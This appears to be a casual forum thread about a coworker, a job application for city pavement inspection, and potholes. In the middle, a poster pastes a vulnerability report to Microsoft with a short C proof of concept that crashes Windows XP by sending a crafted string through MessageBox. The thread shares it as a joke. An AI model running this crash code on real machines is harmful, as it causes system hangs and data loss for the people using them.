That was intended for the person who posted two consecutive posts above me and who also took his final at the same time as I did yesterday. And, LFA, it's not always about you.

My vacation started early today, even though I'm still at work.

The boss is so fed-up with Stroker McJerk today, he sent the guy home instead of sending him to lunch. :banana:

We get paid by the hour here, so my co-worker gets doubleowned!

Dear Secure@microsoft.com,

On one of Russian forum security vulnerability is discussed in
Microsoft Windows (Windows XP is tested). A vulnerability is caused by
memory corruption is string beginning with "\?\" is send thorugh
MessageBox API with MB_SERVICE_NOTIFICATION flag. It looks like some
"debug" feature not cleaned out in final release and it seems to
exploitable to code execution at kernel level. Code example below:

#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}

System hangs, crashes (BSOD) or reboots.

LOL

I hope you get the job.

What would your responsibilities be? Work in an office or in the field?

Almost entirely field work- I'd be inspecting pavement and starting/updating the maintenance databases for all the streets under City control. Why they listed autocad as an essential skill for the job is beyond me.

So if you do get the job, and a year later I'm rolling through town and hit a pothole that takes-out one of my tires, I get to blame you?

Nope.

You get to blame the road crews who haven't filled in the pothole I recorded 7 months previously.
